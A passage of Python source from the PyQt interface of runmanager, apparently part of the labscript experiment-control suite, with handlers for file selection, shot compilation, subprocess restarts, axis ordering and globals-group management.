self.output_popout_button.setIcon(QtGui.QIcon(':/qtutils/fugue/arrow-out'))
else:
# pop it out
# self.ui.verticalLayout_output_tab.remove(self.output_box)
self.output_box_window_verticalLayout.addWidget(self.output_box.output_textedit)
self.output_popout_button.setIcon(QtGui.QIcon(':/qtutils/fugue/arrow-in'))
self.output_box_window.show()
self.output_box_is_popped_out = not self.output_box_is_popped_out
def on_select_labscript_file_clicked(self, checked):
labscript_file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select labscript file',
self.last_opened_labscript_folder,
"Python files (*.py)")
if type(labscript_file) is tuple:
labscript_file, _ = labscript_file
if not labscript_file:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
labscript_file = os.path.abspath(labscript_file)
if not os.path.isfile(labscript_file):
error_dialog("No such file %s." % labscript_file)
return
# Save the containing folder for use next time we open the dialog box:
self.last_opened_labscript_folder = os.path.dirname(labscript_file)
# Write the file to the lineEdit:
self.ui.lineEdit_labscript_file.setText(labscript_file)
# Check if the output folder needs to be updated:
self.check_output_folder_update()
def on_edit_labscript_file_clicked(self, checked):
# get path to text editor
editor_path = self.exp_config.get('programs', 'text_editor')
editor_args = self.exp_config.get('programs', 'text_editor_arguments')
# Get the current labscript file:
current_labscript_file = self.ui.lineEdit_labscript_file.text()
# Ignore if no file selected
if not current_labscript_file:
return
if not editor_path:
error_dialog("No editor specified in the labconfig.")
return
if '{file}' in editor_args:
# Split the args on spaces into a list, replacing {file} with the labscript file
editor_args = [arg if arg != '{file}' else current_labscript_file for arg in editor_args.split()]
else:
# Otherwise if {file} isn't already in there, append it to the other args:
editor_args = [current_labscript_file] + editor_args.split()
try:
subprocess.Popen([editor_path] + editor_args)
except Exception as e:
error_dialog("Unable to launch text editor specified in %s. Error was: %s" %
(self.exp_config.config_path, str(e)))
def on_select_shot_output_folder_clicked(self, checked):
shot_output_folder = QtWidgets.QFileDialog.getExistingDirectory(self.ui,
'Select shot output folder',
self.last_selected_shot_output_folder)
if type(shot_output_folder) is tuple:
shot_output_folder, _ = shot_output_folder
if not shot_output_folder:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
shot_output_folder = os.path.abspath(shot_output_folder)
# Save the containing folder for use next time we open the dialog box:
self.last_selected_shot_output_folder = os.path.dirname(shot_output_folder)
# Write the file to the lineEdit:
self.ui.lineEdit_shot_output_folder.setText(shot_output_folder)
# Update our knowledge about whether this is the default output folder or not:
self.check_output_folder_update()
def on_reset_shot_output_folder_clicked(self, checked):
current_default_output_folder = self.get_default_output_folder()
if not current_default_output_folder:
return
self.ui.lineEdit_shot_output_folder.setText(current_default_output_folder)
self.check_output_folder_update()
def on_labscript_file_text_changed(self, text):
# Blank out the 'edit labscript file' button if no labscript file is
# selected
enabled = bool(text)
self.ui.toolButton_edit_labscript_file.setEnabled(enabled)
# Blank out the 'select shot output folder' button if no labscript
# file is selected:
self.ui.toolButton_select_shot_output_folder.setEnabled(enabled)
self.ui.lineEdit_labscript_file.setToolTip(text)
self.previous_default_output_folder = self.get_default_output_folder()
def on_shot_output_folder_text_changed(self, text):
# Blank out the 'reset default output folder' button if the user is
# already using the default output folder
if text == self.get_default_output_folder():
self.non_default_folder = False
else:
self.non_default_folder = True
self.ui.toolButton_reset_shot_output_folder.setEnabled(self.non_default_folder)
self.ui.label_non_default_folder.setVisible(self.non_default_folder)
self.ui.lineEdit_shot_output_folder.setToolTip(text)
def on_engage_clicked(self):
logger.info('Engage')
try:
send_to_BLACS = self.ui.checkBox_run_shots.isChecked()
send_to_runviewer = self.ui.checkBox_view_shots.isChecked()
labscript_file = self.ui.lineEdit_labscript_file.text()
# Even though we shuffle on a per-global basis, if ALL of the globals are set
# to shuffle then we may as well shuffle the final shot list again. This
# shuffles shots more thoroughly than just shuffling within each level
# (without it, all shots sharing the same value of the outermost variable
# would still be grouped together, etc.)
shuffle = self.ui.pushButton_shuffle.checkState() == QtCore.Qt.Checked
if not labscript_file:
raise Exception('Error: No labscript file selected')
output_folder = self.ui.lineEdit_shot_output_folder.text()
if not output_folder:
raise Exception('Error: No output folder selected')
BLACS_host = self.ui.lineEdit_BLACS_hostname.text()
logger.info('Parsing globals...')
active_groups = self.get_active_groups()
# Get ordering of expansion globals
expansion_order = {}
for i in range(self.axes_model.rowCount()):
item = self.axes_model.item(i, self.AXES_COL_NAME)
shuffle_item = self.axes_model.item(i, self.AXES_COL_SHUFFLE)
name = item.data(self.AXES_ROLE_NAME)
expansion_order[name] = {'order':i, 'shuffle':shuffle_item.checkState()}
try:
sequenceglobals, shots, evaled_globals, global_hierarchy, expansions = self.parse_globals(active_groups, expansion_order=expansion_order)
except Exception as e:
raise Exception('Error parsing globals:\n%s\nCompilation aborted.' % str(e))
logger.info('Making h5 files')
labscript_file, run_files = self.make_h5_files(
labscript_file, output_folder, sequenceglobals, shots, shuffle)
self.ui.pushButton_abort.setEnabled(True)
self.compile_queue.put([labscript_file, run_files, send_to_BLACS, BLACS_host, send_to_runviewer])
except Exception as e:
self.output_box.output('%s\n\n' % str(e), red=True)
logger.info('end engage')
def on_abort_clicked(self):
self.compilation_aborted.set()
def on_restart_subprocess_clicked(self):
# Kill and restart the compilation subprocess
self.to_child.put(['quit', None])
self.from_child.put(['done', False])
time.sleep(0.1)
self.output_box.output('Asking subprocess to quit...')
timeout_time = time.time() + 2
QtCore.QTimer.singleShot(50, lambda: self.check_child_exited(timeout_time, kill=False))
def check_child_exited(self, timeout_time, kill=False):
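# Poll the child process. While it is still running and the timeout has not
# expired, keep rescheduling this check; after the timeout, escalate from
# terminate() to kill(). Once the child has exited, spawn a fresh compiler
# subprocess.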
self.child.poll()
if self.child.returncode is None and time.time() < timeout_time:
QtCore.QTimer.singleShot(50, lambda: self.check_child_exited(timeout_time, kill))
return
elif self.child.returncode is None:
if not kill:
self.child.terminate()
self.output_box.output('not responding.\n')
timeout_time = time.time() + 2
QtCore.QTimer.singleShot(50, lambda: self.check_child_exited(timeout_time, kill=True))
return
else:
self.child.kill()
self.output_box.output('Killed\n', red=True)
elif kill:
self.output_box.output('Terminated\n', red=True)
else:
self.output_box.output('done.\n')
self.output_box.output('Spawning new compiler subprocess...')
self.to_child, self.from_child, self.child = process_tree.subprocess(
'batch_compiler.py', output_redirection_port=self.output_box.port
)
self.output_box.output('done.\n')
self.output_box.output('Ready.\n\n')
def on_tabCloseRequested(self, index):
tab_page = self.ui.tabWidget.widget(index)
for (globals_file, group_name), group_tab in self.currently_open_groups.items():
if group_tab.ui is tab_page:
self.close_group(globals_file, group_name)
break
def on_treeView_axes_context_menu_requested(self, point):
raise NotImplementedError
# menu = QtWidgets.QMenu(self.ui)
# menu.addAction(self.action_axes_check_selected)
# menu.addAction(self.action_axes_uncheck_selected)
# menu.exec_(QtGui.QCursor.pos())
pass
def on_axes_check_selected_triggered(self, *args):
raise NotImplementedError
def on_axes_uncheck_selected_triggered(self, *args):
raise NotImplementedError
def on_axis_to_top_clicked(self, checked):
# Get the selection model from the treeview
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now be one row higher,
# since we start moving elements of the list upwards starting from the lowest index)
while row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row into a position one above
self.axes_model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
row -= 1
self.update_axes_indentation()
def on_axis_up_clicked(self, checked):
# Get the selection model from the treeview
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now be one row higher,
# since we start moving elements of the list upwards starting from the lowest index)
if row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row into a position one above
self.axes_model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
self.update_axes_indentation()
def on_axis_down_clicked(self, checked):
# Get the selection model from the treeview
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not the last element, and the row below it is not selected
# (note that while a row below may have been initially selected, it should by now be one row lower,
# since we start moving elements of the list downwards starting from the highest index)
if row < self.axes_model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row into a position one below
self.axes_model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
self.update_axes_indentation()
def on_axis_to_bottom_clicked(self, checked):
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not the last element, and the row below it is not selected
# (note that while a row below may have been initially selected, it should by now be one row lower,
# since we start moving elements of the list downwards starting from the highest index)
while row < self.axes_model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row into a position one below
self.axes_model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
row += 1
self.update_axes_indentation()
def on_axes_item_changed(self, item):
if item.column() == self.AXES_COL_SHUFFLE:
self.update_global_shuffle_state()
def update_global_shuffle_state(self, *args, **kwargs):
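# Update the master shuffle button to reflect the per-axis shuffle
# checkboxes: checked if all axes are checked, unchecked if none are, and
# partially checked (tristate) if they are mixed.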
all_checked = True
none_checked = True
for i in range(self.axes_model.rowCount()):
check_state = self.axes_model.item(i, self.AXES_COL_SHUFFLE).checkState() == QtCore.Qt.Checked
all_checked = all_checked and check_state
none_checked = none_checked and not check_state
if not all_checked and not none_checked:
self.ui.pushButton_shuffle.setTristate(True)
self.ui.pushButton_shuffle.setCheckState(QtCore.Qt.PartiallyChecked)
elif none_checked and not all_checked:
self.ui.pushButton_shuffle.setTristate(False)
self.ui.pushButton_shuffle.setCheckState(QtCore.Qt.Unchecked)
elif all_checked and not none_checked:
self.ui.pushButton_shuffle.setTristate(False)
self.ui.pushButton_shuffle.setCheckState(QtCore.Qt.Checked)
else:
# No axes. If the button was partially checked, set it to checked; otherwise leave it alone:
if self.ui.pushButton_shuffle.checkState() == QtCore.Qt.PartiallyChecked:
self.ui.pushButton_shuffle.setTristate(False)
self.ui.pushButton_shuffle.setCheckState(QtCore.Qt.Checked)
def on_master_shuffle_clicked(self, state):
if state in [QtCore.Qt.Checked, QtCore.Qt.Unchecked]:
self.ui.pushButton_shuffle.setTristate(False)
for i in range(self.axes_model.rowCount()):
item = self.axes_model.item(i, self.AXES_COL_SHUFFLE)
if item.checkState() != state:
self.axes_model.item(i, self.AXES_COL_SHUFFLE).setCheckState(state)
def on_treeView_groups_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui)
menu.addAction(self.action_groups_set_selection_active)
menu.addAction(self.action_groups_set_selection_inactive)
menu.addAction(self.action_groups_delete_selected)
menu.addAction(self.action_groups_open_selected)
menu.addAction(self.action_groups_close_selected_groups)
menu.addAction(self.action_groups_close_selected_files)
copy_menu = QtWidgets.QMenu('Copy selected group(s) to...', menu)
copy_menu.setIcon(QtGui.QIcon(':/qtutils/fugue/blue-document-copy'))
menu.addMenu(copy_menu)
move_menu = QtWidgets.QMenu('Move selected group(s) to...', menu)
move_menu.setIcon(QtGui.QIcon(':/qtutils/fugue/blue-document--arrow'))
menu.addMenu(move_menu)
# Create a dict of all filepaths -> filenames
filenames = {}
for index in range(self.groups_model.rowCount()):
filepath = self.groups_model.item(index, self.GROUPS_COL_NAME).text()
filenames[filepath] = filepath.split(os.sep)[-1]
# Expand duplicate filenames with their parent directories until there
# are no more duplicates:
i = 2
while len(set(filenames.values())) < len(filenames):
new_filename = {}
for filepath, filename in filenames.items():
if list(filenames.values()).count(filename) > 1:
new_filename[filepath] = os.sep.join(filepath.split(os.sep)[-i:])
else:
new_filename[filepath] = filename
filenames = new_filename
i += 1
# add all filenames to the copy and move submenu
for filepath, filename in filenames.items():
copy_menu.addAction(filename, lambda filepath=filepath: self.on_groups_copy_selected_groups_triggered(filepath, False))
move_menu.addAction(filename, lambda filepath=filepath: self.on_groups_copy_selected_groups_triggered(filepath, True))
menu.exec_(QtGui.QCursor.pos())
def on_groups_copy_selected_groups_triggered(self, dest_globals_file=None, delete_source_group=False):
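# Copy each selected group to the destination globals file, deleting the
# source group afterwards if delete_source_group is True (i.e. a move).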
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
for item in name_items:
source_globals_file = item.parent().text()
self.copy_group(source_globals_file, item.text(), dest_globals_file, delete_source_group)
def on_groups_set_selection_active_triggered(self, checked_state):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
# Filter to only include the 'active' column:
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
active_items = (item for item in selected_items
if item.column() == self.GROUPS_COL_ACTIVE
and item.parent() is not None)
for item in active_items:
item.setCheckState(checked_state)
def on_groups_delete_selected_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
# If multiple selected, show 'delete n groups?' message. Otherwise,
# pass confirm=True to self.delete_group so it can show the regular
# message.
confirm_multiple = (len(name_items) > 1)
if confirm_multiple:
if not question_dialog("Delete %d groups?" % len(name_items)):
return
for item in name_items:
globals_file = item.parent().text()
group_name = item.text()
self.delete_group(globals_file, group_name, confirm=not confirm_multiple)
def on_groups_open_selected_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = [self.groups_model.itemFromIndex(index) for index in selected_indexes]
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
# Include all groups of selected globals files:
for item in selected_items:
if item.parent() is None:
children = [item.child(i) for i in range(item.rowCount())]
# Exclude <add new group> item, which is not selectable
name_items += [child for child in children if child.isSelectable() ]
filenames = set(item.parent().text() for item in name_items)
for item in name_items:
globals_file = item.parent().text()
group_name = item.text()
if (globals_file, group_name) not in self.currently_open_groups:
self.open_group(globals_file, group_name, trigger_preparse=False)
if name_items:
self.globals_changed()
def on_groups_close_selected_groups_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
for item in name_items:
globals_file = item.parent().text()
group_name = item.text()
if (globals_file, group_name) in self.currently_open_groups:
self.close_group(globals_file, group_name)
def on_groups_close_selected_files_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is None]
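# Gather the open/close items of all groups under the selected files, so we
# can warn the user how many currently open groups will be closed: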
child_openclose_items = [item.child(i, self.GROUPS_COL_OPENCLOSE)
for item in name_items
for i in range(item.rowCount())]
child_is_open = [child_item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
for child_item in child_openclose_items]
if any(child_is_open):
if not question_dialog('Close %d file(s)? This will close %d currently open group(s).' %
(len(name_items), child_is_open.count(True))):
return
for item in name_items:
globals_file = item.text()
self.close_globals_file(globals_file, confirm=False)
def on_open_globals_file_clicked(self):
globals_file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select globals file',
self.last_opened_globals_folder,
"HDF5 files (*.h5)")
if type(globals_file) is tuple:
globals_file, _ = globals_file
if not globals_file:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
globals_file = os.path.abspath(globals_file)
if not os.path.isfile(globals_file):
error_dialog("No such file %s." % globals_file)
return
# Save the containing folder for use next time we open the dialog box:
self.last_opened_globals_folder = os.path.dirname(globals_file)
# Open the file:
self.open_globals_file(globals_file)
def on_new_globals_file_clicked(self):
globals_file = QtWidgets.QFileDialog.getSaveFileName(self.ui,
'Create new globals file',
self.last_opened_globals_folder,
"HDF5 files (*.h5)")
if type(globals_file) is tuple:
globals_file, _ = globals_file
if not globals_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
globals_file = os.path.abspath(globals_file)
# Save the containing folder for use next time we open the dialog box:
self.last_opened_globals_folder = os.path.dirname(globals_file)
# Create the new file and open it:
runmanager.new_globals_file(globals_file)
self.open_globals_file(globals_file)
def on_diff_globals_file_clicked(self):
globals_file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select globals file to compare',
self.last_opened_globals_folder,
"HDF5 files (*.h5)")
if type(globals_file) is tuple:
globals_file, _ = globals_file
if not globals_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
globals_file = os.path.abspath(globals_file)
# Get runmanager's globals
active_groups = self.get_active_groups()
if active_groups is None:
# Invalid group selection
return
# Get file's globals groups
other_groups = runmanager.get_all_groups(globals_file)
# Display the output tab so the user can see the output:
self.ui.tabWidget.setCurrentWidget(self.ui.tab_output)
self.output_box.output('Globals diff with:\n%s\n\n' % globals_file)
# Do the globals diff
globals_diff_table = runmanager.globals_diff_groups(active_groups, other_groups)
self.output_box.output(globals_diff_table)
self.output_box.output('Ready.\n\n')
def on_treeView_groups_leftClicked(self, index):
"""Here we respond to user clicks on the treeview. We do the following:
- If the user clicks on the <click to add group> dummy row, we go into
edit mode on it so they can enter the name of the new group they
want.
- If the user clicks on the icon to open or close a globals file or a
group, we call the appropriate open and close methods and update the
open/close data role on the model.
- If the user clicks delete on a globals group, we call a delete
method, which deletes it after confirmation, and closes it if it was
open.
"""
if qapplication.keyboardModifiers() != QtCore.Qt.NoModifier:
# Only handle mouseclicks with no keyboard modifiers.
return
item = self.groups_model.itemFromIndex(index)
# The 'name' item in the same row:
name_index = index.sibling(index.row(), self.GROUPS_COL_NAME)
name_item = self.groups_model.itemFromIndex(name_index)
# The parent item, None if there is no parent:
parent_item = item.parent()
# What kind of row did the user click on?
# A globals file, a group, or a 'click to add group' row?
if item.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
# They clicked on an 'add new group' row. Enter editing
# mode on the name item so they can enter a name for
# the new group:
self.ui.treeView_groups.setCurrentIndex(name_index)
self.ui.treeView_groups.edit(name_index)
if item.column() == self.GROUPS_COL_ACTIVE:
# They clicked on the active column. Toggle the checkbox. We do
# this manually because setting the item checkable means the model
# changes before we catch the mouse click. This is a pain because
# we want the ensuing sorting (if the user is sorting by the
# enabled column) to keep the the selection. If the user only
# selected the column by clicking on it, then the sort happens
# before they selected it, and the resort happens without a visual
# indication of where the item went, because it never got
# selected.
state = item.checkState()
if state in (QtCore.Qt.Unchecked, QtCore.Qt.PartiallyChecked):
item.setCheckState(QtCore.Qt.Checked)
elif state == QtCore.Qt.Checked:
item.setCheckState(QtCore.Qt.Unchecked)
else:
raise AssertionError('Invalid Check state')
# If this changed the sort order, ensure the item is still visible:
scroll_view_to_row_if_current(self.ui.treeView_groups, item)
elif parent_item is None:
# They clicked on a globals file row.
globals_file = name_item.text()
# What column did they click on?
if item.column() == self.GROUPS_COL_OPENCLOSE:
# They clicked the close button. Close the file:
self.close_globals_file(globals_file)
else:
# They clicked on a globals group row.
globals_file = parent_item.text()
group_name = name_item.text()
# What column did they click on?
if item.column() == self.GROUPS_COL_DELETE:
# They clicked the delete button. Delete the group:
self.delete_group(globals_file, group_name, confirm=True)
elif item.column() == self.GROUPS_COL_OPENCLOSE:
# They clicked the open/close button. Which is it, open or close?
group_is_open = item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
if group_is_open:
self.close_group(globals_file, group_name)
else:
self.open_group(globals_file, group_name)
def on_treeView_groups_doubleLeftClicked(self, index):
item = self.groups_model.itemFromIndex(index)
# The parent item, None if there is no parent:
parent_item = item.parent()
if item.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
return
elif parent_item and item.column() == self.GROUPS_COL_NAME:
# it's a group name item. What's the group and file name?
globals_file = parent_item.text()
group_name = item.text()
if (globals_file, group_name) not in self.currently_open_groups:
self.open_group(globals_file, group_name)
# Focus the tab:
group_tab = self.currently_open_groups[globals_file, group_name]
for i in range(self.ui.tabWidget.count()):
if self.ui.tabWidget.widget(i) is group_tab.ui:
self.ui.tabWidget.setCurrentIndex(i)
break
def on_groups_model_item_changed(self, item):
"""This function is for responding to data changes in the model. The
methods for responding to changes in different columns do different
things. Mostly they make other data changes for model consistency, but
also group creation and renaming is handled in response to changes to
the 'name' column. When we change things elsewhere, we prefer to only
change one thing, and let the rest of the changes be triggered here.
Be careful not to recurse unsafely into this method - changing
something that itself triggers further changes is fine so long as they
peter out and don't get stuck in a loop. If recursion needs to be
stopped, one can disconnect the signal temporarily with the context
manager self.groups_model_item_changed_disconnected. But use this
sparingly, otherwise there's the risk that some required data updates
will be forgotten about and won't happen.
"""
if item.column() == self.GROUPS_COL_NAME:
self.on_groups_model_name_changed(item)
elif item.column() == self.GROUPS_COL_ACTIVE:
self.on_groups_model_active_changed(item)
elif item.column() == self.GROUPS_COL_OPENCLOSE:
self.on_groups_model_openclose_changed(item)
def on_groups_model_name_changed(self, item):
"""Handles group renaming and creation of new groups due to the user
editing the <click to add group> item"""
parent_item = item.parent()
# File rows are supposed to be uneditable, but just to be sure we have
# a group row:
assert parent_item is not None
if item.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
item_text = item.text()
if item_text != self.GROUPS_DUMMY_ROW_TEXT:
# The user has made a new globals group by editing the <click
# to add group> item.
globals_file = parent_item.text()
group_name = item_text
self.new_group(globals_file, group_name)
else:
# User has renamed a globals group.
new_group_name = item.text()
previous_group_name = item.data(self.GROUPS_ROLE_PREVIOUS_NAME)
# Ensure it truly is a name change, and not something else about
# the item changing:
if new_group_name != previous_group_name:
globals_file = parent_item.text()
self.rename_group(globals_file, previous_group_name, new_group_name)
def on_groups_model_active_changed(self, item):
"""Sets the sort data for the item in response to its check state
changing. Also, if this is the first time this function has been
called on the stack, that is, the change was initiated externally
instead of via recursion from this function itself, then set the check
state of other items for consistency. This entails checking/unchecking
all group rows in response to the file row's check state changing, or
changing the file row's check state to reflect the check state of the
child group rows. That's why we need to keep track of the recursion
depth - so that those changes we make don't in turn cause further
changes. But we don't disconnect the on_changed signal altogether,
because we still want to do the update of the sort data, and anything
else that might be added in future."""
self.on_groups_model_active_changed_recursion_depth += 1
try:
check_state = item.checkState()
# Ensure sort data matches active state:
item.setData(check_state, self.GROUPS_ROLE_SORT_DATA)
if self.on_groups_model_active_changed_recursion_depth > 1:
# Prevent all below code from running in response to data changes
# initiated from within this method itself. The code above this
# check still runs in response to all changes.
return
parent_item = item.parent()
if parent_item is not None:
# A 'group active' checkbox changed due to external action (not from this method itself).
# Update the parent file checkbox to reflect the state of its children
children = [parent_item.child(i, self.GROUPS_COL_ACTIVE) for i in range(parent_item.rowCount())]
child_states = [child.checkState() for child in children
if not child.data(self.GROUPS_ROLE_IS_DUMMY_ROW)]
parent_active_index = parent_item.index().sibling(parent_item.index().row(), self.GROUPS_COL_ACTIVE)
parent_active_item = self.groups_model.itemFromIndex(parent_active_index)
if all(state == QtCore.Qt.Checked for state in child_states):
parent_active_item.setCheckState(QtCore.Qt.Checked)
elif all(state == QtCore.Qt.Unchecked for state in child_states):
parent_active_item.setCheckState(QtCore.Qt.Unchecked)
else:
parent_active_item.setCheckState(QtCore.Qt.PartiallyChecked)
else:
# A 'file active' checkbox changed due to external action (not from this method itself).
# Update the check state of all children to match.
name_index = item.index().sibling(item.index().row(), self.GROUPS_COL_NAME)
name_item = self.groups_model.itemFromIndex(name_index)
checkstate = item.checkState()
children = [name_item.child(i, self.GROUPS_COL_ACTIVE) for i in range(name_item.rowCount())]
for child in children:
if not child.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
child.setCheckState(checkstate)
finally:
self.on_groups_model_active_changed_recursion_depth -= 1
if self.on_groups_model_active_changed_recursion_depth == 0:
self.do_model_sort()
# Trigger a preparse to occur:
self.globals_changed()
def on_groups_model_openclose_changed(self, item):
"""Sets item sort data and icon in response to the open/close state of a group
changing."""
parent_item = item.parent()
# The open/close state of a globals group changed. It is definitely a
# group, not a file, as the open/close state of a file shouldn't be
# changing.
assert parent_item is not None # Just to be sure.
# Ensure the sort data matches the open/close state:
group_is_open = item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
item.setData(group_is_open, self.GROUPS_ROLE_SORT_DATA)
# Set the appropriate icon and tooltip. Changing the icon causes
# itemChanged to be emitted, even if it is the same icon, and even if we
# were to use the same QIcon instance. So to avoid infinite recursion
# we temporarily disconnect the signal whilst we set the icons.
with self.groups_model_item_changed_disconnected:
if group_is_open:
item.setIcon(QtGui.QIcon(':qtutils/fugue/cross'))
item.setToolTip('Close globals group.')
else:
item.setIcon(QtGui.QIcon(':qtutils/fugue/plus'))
item.setToolTip('Load globals group into runmanager.')
self.do_model_sort()
# If this changed the sort order, ensure the item is still visible:
scroll_view_to_row_if_current(self.ui.treeView_groups, item)
@inmain_decorator()
def get_default_output_folder(self):
"""Returns what the default output folder would be right now, based on
the current date and selected labscript file. Returns empty string if
no labscript file is selected. Does not create the default output
folder, does not check if it exists."""
current_labscript_file = self.ui.lineEdit_labscript_file.text()
if not current_labscript_file:
return ''
_, default_output_folder, _ = runmanager.new_sequence_details(
current_labscript_file,
config=self.exp_config,
increment_sequence_index=False,
)
default_output_folder = os.path.normpath(default_output_folder)
return default_output_folder
def rollover_shot_output_folder(self):
"""Runs in a thread, checking every 30 seconds if the default output folder has
changed, likely because the date has changed, but also possibly because another
instance of runmanager has incremented the sequence index. If the default output
folder has changed, and if runmanager is configured to use the default output
folder, sets the folder in which compiled shots will be put. Does not create the
folder if it does not already exist, this will be done at compile-time."""
while True:
time.sleep(30)
try:
self.check_output_folder_update()
except Exception as e:
# Don't stop the thread.
logger.exception("error checking default output folder")
@inmain_decorator()
def check_output_folder_update(self):
"""Do a single check of whether the output folder needs updating. This
is implemented as a separate function from the above loop so that the
whole check happens at once in the Qt main thread and hence is atomic
and can't be interfered with by other Qt calls in the program."""
current_default_output_folder = self.get_default_output_folder()
if not current_default_output_folder:
# No labscript file selected:
return
currently_selected_output_folder = self.ui.lineEdit_shot_output_folder.text()
if current_default_output_folder != self.previous_default_output_folder:
# It's a new day, or a new labscript file.
# Is the user using default folders?
if currently_selected_output_folder == self.previous_default_output_folder:
# Yes they are. In that case, update to use the new folder:
self.ui.lineEdit_shot_output_folder.setText(current_default_output_folder)
self.previous_default_output_folder = current_default_output_folder
@inmain_decorator()
def globals_changed(self):
"""Called from either self, a GroupTab, or the RemoteServer to inform runmanager
that something about globals has changed, and that they need parsing again."""
self.ui.pushButton_engage.setEnabled(False)
self.preparse_globals_required.put(None)
def update_axes_indentation(self):
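# Prefix each axis name with whitespace proportional to its row index, so
# that the nesting order of the axes is visually apparent: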
for i in range(self.axes_model.rowCount()):
item = self.axes_model.item(i, self.AXES_COL_NAME)
text = item.text().lstrip()
text = ' '*i + text
item.setText(text)
@inmain_decorator() # Is called by preparser thread
def update_axes_tab(self, expansions, dimensions):
# get set of expansions
expansion_list = []
for global_name, expansion in expansions.items():
if expansion:
if expansion == 'outer':
expansion_list.append('outer '+global_name)
else:
expansion_list.append('zip '+expansion)
expansion_list = set(expansion_list)
# find items to delete
for i in reversed(range(self.axes_model.rowCount())):
item = self.axes_model.item(i, self.AXES_COL_NAME)
name = item.data(self.AXES_ROLE_NAME)
if name not in expansion_list:
item = self.axes_model.takeRow(i)
del item
else:
length_item = self.axes_model.item(i, self.AXES_COL_LENGTH)
if name in dimensions:
length_item.setText("{}".format(dimensions[name]))
else:
length_item.setText('Unknown')
# remove from expansions list so we don't add it again
expansion_list.remove(name)
# add new rows
for expansion_name in expansion_list:
shuffle = self.ui.pushButton_shuffle.checkState() != QtCore.Qt.Unchecked
self.add_item_to_axes_model(expansion_name, shuffle, dimensions)
self.update_axes_indentation()
def add_item_to_axes_model(self, expansion_name, shuffle, dimensions = None):
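# Build the (name, length, shuffle) row for a new axis and append it to the
# axes model, with an icon indicating whether it is an 'outer' or 'zip'
# expansion.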
if dimensions is None:
dimensions = {}
items = []
expansion_type, name = expansion_name.split()
name_item = QtGui.QStandardItem(name)
name_item.setData(expansion_name, self.AXES_ROLE_NAME)
if expansion_type == 'outer':
name_item.setIcon(QtGui.QIcon(':qtutils/custom/outer'))
else:
name_item.setIcon(QtGui.QIcon(':qtutils/custom/zip'))
